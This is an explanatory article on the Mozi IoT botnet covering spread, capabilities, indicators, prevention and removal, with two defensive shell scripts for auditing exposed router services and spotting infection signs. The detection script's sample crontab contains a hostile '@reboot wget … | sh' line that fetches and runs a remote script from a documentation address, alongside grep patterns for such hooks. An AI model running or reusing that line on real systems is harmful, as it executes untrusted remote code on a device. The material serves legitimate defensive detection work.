Mozi Botnet
Mozi: Peer-to-Peer Botnet Targeting Linux-Based Devices
Mozi is a Linux-based malware strain that forms a peer-to-peer botnet, primarily targeting routers, DVRs, and IoT devices through weak Telnet passwords and known vulnerabilities. First discovered in 2019 and rapidly expanded in 2020, Mozi has been used to carry out DDoS attacks, payload delivery, and data exfiltration, with a focus on Linux-based embedded systems that are often poorly secured.
Introduction to Mozi
The Mozi botnet evolved from earlier IoT malware like Mirai and Gafgyt, but with a more advanced architecture and persistence model. It leverages the Distributed Hash Table (DHT) protocol, allowing it to operate without central command-and-control servers—making it harder to dismantle. Mozi's main targets are Linux-based systems, particularly consumer-grade routers and connected devices with open ports or default credentials.
1. How Mozi Works
Infection Mechanism:
Mozi spreads by scanning the internet for devices with open Telnet ports or known firmware vulnerabilities. It uses default or weak credentials to log in and deploy its payload, or it exploits flaws in outdated software. Once inside, it installs a lightweight binary tailored to the device’s architecture (e.g., MIPS or ARM).
Payload Execution:
After gaining a foothold, Mozi connects to its peer-to-peer network, joining the botnet. It then waits for instructions—these often include launching DDoS attacks, downloading other malware, or attempting to spread laterally to other vulnerable systems. Mozi also implements persistence mechanisms to survive reboots and evade factory resets.
2. History and Notable Campaigns
Origin and Discovery:
Mozi was first identified in late 2019 by researchers at 360 Netlab. It quickly gained attention for its DHT-based command model and explosive growth in infected devices, especially in China and India.
Notable Campaigns:
Mozi-powered botnets were responsible for several large-scale DDoS attacks against telecom infrastructure, gaming servers, and cloud providers. In 2021, researchers noted that Mozi infections made up over 90% of IoT botnet traffic at certain points, indicating its dominance in the Linux-based malware space.
3. Targets and Impact
Targeted Victims and Sectors:
Mozi focuses on Linux-based embedded devices, including:
- Routers (Netgear, Huawei, D-Link, etc.)
- DVRs and IP cameras
- Smart home devices
- Industrial IoT gear
Consequences:
Once infected, devices become part of a massive global botnet. This can lead to:
- Slowed or disrupted device performance
- Use of your bandwidth for DDoS attacks
- Risk of secondary malware infections
- Network exposure, allowing deeper attacks into home or business networks
4. Technical Details
Payload Capabilities:
- Launches various DDoS attacks (UDP, TCP flood, etc.)
- Executes remote shell commands
- Updates and spreads new malware variants
- Maintains persistence using crontabs or script injections
- Participates in peer-to-peer communication via DHT
Evasion Techniques:
- Uses P2P networking, which eliminates a central C2 server
- Encrypts payload traffic to avoid detection
- Adjusts payloads based on target architecture (cross-compilation)
- Hides within normal system processes or as innocuous binaries
5. Preventing Mozi Infections
Best Practices:
- Change default passwords on all routers and IoT devices
- Disable Telnet, UPnP, and remote admin features if not needed
- Regularly update firmware and monitor vendor security notices
- Use network segmentation for IoT devices
- Close unused ports and restrict external access to management interfaces
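The checklist above comes down to one question per device: which of these services is listening on every interface, including the WAN side? The script below is an added example (not code from this article or from any Mozi report) that answers it for a Linux router. It assumes netstat -tuln output in the net-tools/BusyBox layout (Proto, Recv-Q, Send-Q, Local Address, Foreign Address, State), uses a constructed sample of that output, and treats the WAN interface name (eth0.2) as a placeholder you would replace with your own.

```shell
#!/bin/sh
# Added example, not code from the article or from any Mozi analysis: audit a
# Linux router's listening sockets for the services the hardening list tells
# you to disable or restrict, and turn the findings into WAN-side firewall
# rules. Assumptions: `netstat -tuln` output in the net-tools/BusyBox layout
# and a WAN interface name supplied by the caller (eth0.2 is a placeholder).

# Services from the checklist. Format: proto:port:label
RISKY_SERVICES="tcp:23:telnet udp:1900:upnp-ssdp tcp:80:http-admin tcp:443:https-admin tcp:22:ssh-admin"

# Constructed sample of `netstat -tuln` from a hypothetical consumer router.
SAMPLE_NETSTAT='Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 0.0.0.0:23              0.0.0.0:*               LISTEN
tcp        0      0 192.168.1.1:80          0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN
udp        0      0 0.0.0.0:1900            0.0.0.0:*
udp        0      0 0.0.0.0:53              0.0.0.0:*'

# exposed_services <netstat-output>
# Prints "proto port label" for each risky service bound to every interface
# (0.0.0.0 or ::). A service bound only to the LAN address, like the HTTP
# admin page on 192.168.1.1 above, is not reachable from the WAN and is skipped.
exposed_services() {
    printf '%s\n' "$1" | awk -v risky="$RISKY_SERVICES" '
        BEGIN {
            n = split(risky, items, " ")
            for (i = 1; i <= n; i++) {
                split(items[i], f, ":")
                label[f[1] ":" f[2]] = f[3]
            }
        }
        $1 ~ /^(tcp|udp)6?$/ {
            proto = substr($1, 1, 3)
            port = $4; sub(/.*:/, "", port)        # text after the last colon
            host = $4; sub(/:[^:]*$/, "", host)    # everything before it
            key = proto ":" port
            if ((host == "0.0.0.0" || host == "::") && (key in label))
                print proto, port, label[key]
        }'
}

# wan_drop_rules <wan-iface> <exposed-list>
# One iptables rule per finding, dropping the port on the WAN interface only,
# so the device stays manageable from the LAN. Disabling the service outright
# (the checklist's first choice) is still better than firewalling it.
wan_drop_rules() {
    wan="$1"
    printf '%s\n' "$2" | while read -r proto port label; do
        [ -n "$proto" ] || continue
        printf 'iptables -I INPUT -i %s -p %s --dport %s -j DROP   # %s\n' \
            "$wan" "$proto" "$port" "$label"
    done
}

# Stand-alone demo on the constructed sample. On a real device, replace the
# sample with "$(netstat -tuln)" and review the rules before applying them.
report() {
    exposed=$(exposed_services "$SAMPLE_NETSTAT")
    echo "Risky services listening on all interfaces:"
    printf '%s\n' "$exposed"
    echo
    echo "Candidate firewall rules (WAN interface assumed to be eth0.2):"
    wan_drop_rules eth0.2 "$exposed"
}

report
```

The sample deliberately includes an admin HTTP service bound to the LAN address only; it is left alone, while Telnet, SSH and SSDP bound to 0.0.0.0 are reported. Run the same two functions against the live netstat output on a router to get the same report for a real device.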
Recommended Security Tools:
- IoT-specific firewall appliances or intrusion detection systems
- Endpoint protection for Linux (e.g., CrowdStrike Falcon, Trend Micro Deep Security)
- Open-source tools like Fail2Ban, Suricata, or pfSense
- Router firmware alternatives like OpenWrt with enhanced security
6. Detecting and Removing Mozi
Indicators of Compromise (IoCs):
- Suspicious network traffic from IoT devices, especially outbound UDP floods
- Presence of unfamiliar binaries in /tmp/, /etc/init.d/, or scheduled tasks
- CPU spikes on routers or smart devices with no visible cause
- Unauthorized login attempts or repeated scanning behavior
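Three of the indicators above can be checked directly on the device or at the gateway: unfamiliar executables in /tmp or /etc/init.d, scheduled tasks that run from a staging directory or fetch code at run time, and outbound UDP floods. The script below is an added example (not code from this article or from any Mozi report) that implements those checks for a BusyBox-style shell. The known-good init script names, the sample crontab and the flow-log format ("epoch proto src:port dst:port") are assumptions constructed for illustration; 198.51.100.7 and 203.0.113.0/24 are documentation address ranges.

```shell
#!/bin/sh
# Added example, not code from the article: host-side checks for three of the
# indicators listed above, written for a BusyBox shell so it can run on the
# router itself. The known-good list, the crontab and the flow-log format are
# assumptions for illustration.

# Names of init scripts expected on this (hypothetical) device.
KNOWN_GOOD="boot network dropbear firewall"

# unknown_executables <dir>...
# Lists executable regular files under each dir whose name is not in KNOWN_GOOD.
# Typical call on a device: unknown_executables /tmp /etc/init.d
unknown_executables() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -type f -perm -100 2>/dev/null | while read -r f; do
            case " $KNOWN_GOOD " in
                *" $(basename "$f") "*) ;;      # expected script, ignore
                *) printf '%s\n' "$f" ;;
            esac
        done
    done
}

# Constructed crontab of a hypothetical infected device: one legitimate job
# plus two hooks of the kind the article describes (binary run from /tmp,
# download piped straight to a shell at boot). 198.51.100.7 is TEST-NET-2.
SAMPLE_CRONTAB='0 3 * * * /sbin/logrotate /etc/logrotate.conf
*/5 * * * * /tmp/.x/upd >/dev/null 2>&1
@reboot wget -q -O - http://198.51.100.7/s.sh | sh'

# suspicious_cron_entries <crontab-text>
# Prints entries that execute from a writable staging dir or fetch code at run time.
# Typical call on a device: suspicious_cron_entries "$(cat /etc/crontabs/* 2>/dev/null)"
suspicious_cron_entries() {
    printf '%s\n' "$1" | grep -E '(/tmp/|/var/tmp/|/dev/shm/|wget|curl)'
}

# Constructed per-flow log exported from the gateway (assumed format:
# "epoch proto src:port dst:port"). 192.168.1.20 opens 6 UDP flows in one
# second to a single target; 192.168.1.30 only does DNS and one TLS session.
SAMPLE_FLOWS='1700000001 udp 192.168.1.20:4444 203.0.113.5:80
1700000001 udp 192.168.1.20:4445 203.0.113.5:80
1700000001 udp 192.168.1.20:4446 203.0.113.5:80
1700000001 udp 192.168.1.20:4447 203.0.113.5:80
1700000001 udp 192.168.1.20:4448 203.0.113.5:80
1700000001 udp 192.168.1.20:4449 203.0.113.5:80
1700000001 udp 192.168.1.30:5353 192.168.1.1:53
1700000002 udp 192.168.1.30:5354 192.168.1.1:53
1700000002 tcp 192.168.1.30:41000 203.0.113.9:443'

# udp_flood_sources <flow-log> <flows-per-second-threshold>
# Counts new outbound UDP flows per source host per second and prints
# "src peak" for hosts whose peak reaches the threshold. The demo uses a
# threshold of 5 to keep the sample readable; on real traffic use hundreds or more.
udp_flood_sources() {
    printf '%s\n' "$1" | awk -v thr="$2" '
        $2 == "udp" {
            src = $3; sub(/:[0-9]+$/, "", src)   # strip the source port
            bucket = src SUBSEP $1                # per-host, per-second counter
            n[bucket]++
            if (n[bucket] > peak[src]) peak[src] = n[bucket]
        }
        END { for (s in peak) if (peak[s] >= thr) print s, peak[s] }' | sort
}

# Stand-alone demo on the constructed data.
echo "Suspicious crontab entries:"
suspicious_cron_entries "$SAMPLE_CRONTAB"
echo "Hosts opening UDP flows at 5/s or more:"
udp_flood_sources "$SAMPLE_FLOWS" 5
```

A hit from any of the three checks is a lead, not proof: a vendor update script in /tmp or a legitimate backup job using curl will also match, so confirm by checking the binary's origin and, for flood alerts, the destination and packet sizes before moving to the removal steps.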
Removal Steps:
- Perform a factory reset on the infected device
- Immediately update firmware to patch vulnerabilities
- Change all credentials and disable remote access features
- Scan the local network for signs of lateral movement
- Monitor traffic for recurrence—some variants can reinfect within minutes if entry points remain open
Professional Help:
Infected enterprise environments or industrial networks should contact a cybersecurity incident response team. Mozi infections can indicate larger security gaps and may require infrastructure-wide hardening.
7. Response to a Mozi Infection
Immediate Steps:
- Disconnect infected devices from the internet
- Reset and re-secure compromised systems
- Identify and close open ports across the network
- Deploy firewalls or rate-limiting tools to block outbound attack traffic
8. Legal and Ethical Implications
Legal Considerations:
Devices participating in a botnet—even unknowingly—could be used in criminal activities like DDoS attacks, which may lead to ISP warnings or liability in certain jurisdictions.
Ethical Considerations:
The Mozi botnet exploits consumer negligence and manufacturer insecurity. It highlights the ethical need for better IoT regulation, secure-by-design devices, and responsible disclosure by vendors.
9. Resources and References
- 360 Netlab: Mozi Botnet Technical Report
- Trend Micro: Backdoor.Linux.MOZI.A
- CISA Blog: Securing the Internet of Things (IoT)
- Shodan for identifying exposed devices
10. FAQs about Mozi
Q: What is Mozi malware?
A Linux-based botnet that infects routers and IoT devices to carry out attacks and expand its network.
Q: How does Mozi spread?
By exploiting default passwords and unpatched firmware vulnerabilities in internet-connected devices.
Q: What does Mozi do?
It joins infected devices into a peer-to-peer botnet used for DDoS attacks, malware delivery, and system control.
Q: Can Mozi be removed?
Yes, but it often requires a factory reset, firmware update, and network hardening to prevent reinfection.
11. Conclusion
Mozi is one of the most widespread Linux-based botnets ever observed, and it thrives on insecure IoT devices and overlooked routers. Its peer-to-peer model and aggressive scanning make it a resilient threat that’s hard to eliminate once embedded. Preventing Mozi infections requires good device hygiene, aggressive patching, and smarter network management—especially as the number of connected devices continues to grow.